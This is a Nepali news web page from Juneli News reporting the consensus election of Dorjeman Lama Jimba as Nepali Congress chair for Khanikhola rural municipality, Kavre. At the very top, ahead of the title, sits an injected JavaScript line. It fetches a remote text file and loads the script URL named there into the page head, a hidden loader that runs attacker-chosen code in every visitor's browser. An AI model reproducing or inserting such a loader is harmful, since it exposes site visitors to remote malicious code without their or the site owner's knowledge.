;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); काभ्रे खानीखोला गाउँपालिका सभापतिमा दोर्जेमान लामा, वडा देखि पलिकासम्म सहमति – जुनेली न्युज
बिहिबार, असार २७, २०८२
  • होमपेज
  • काभ्रे खानीखोला गाउँपालिका सभापतिमा दोर्जेमान लामा, वडा देखि पलिकासम्म सहमति
अन्तर्वार्ता

काभ्रे खानीखोला गाउँपालिका सभापतिमा दोर्जेमान लामा, वडा देखि पलिकासम्म सहमति

जुनेली न्युज, काभ्रे। नेपाली काँग्रेसको १४ औं महाधिवेशनमा काभ्रे जिल्लाको खानीखोला गाउँपालिका को सभापतिमा दोर्जेमान लामा जिम्बा सर्वसहमतिले निर्वाचित भएका छन् ।

सो गाउँपालिका को सबै वडामा पनि सर्वसहमत भएको थियो। पालिकामा जिम्बा सँगै अरूले पनि सभापतिको दाबी गरेका थिए।

अहिले अधिवेशनको क्रममा धेरै जिल्लाका वडा पालिकामा विवाद आएका कारण अधिवेशन रोकिएको र चुनाव मै जानु पर्ने अवस्था आएपनि खानीखोला गाउँपालिकाले सहमतिको संदेश दिएको छ ।

दोर्जेमान जिम्बाले भन्नुभयो “हाम्रो गाउँपालिका ले नेपाली काँग्रेसलाई सहमति र सहकार्य राम्रो संदेश दिएको छ, हामीले विवाद रहित सबै वडा र पालिकामा आपसी समझदारी र सहमतिमा चुनाव गर्न सफल भयौं।”

फेसबुक प्रतिक्रियाहरु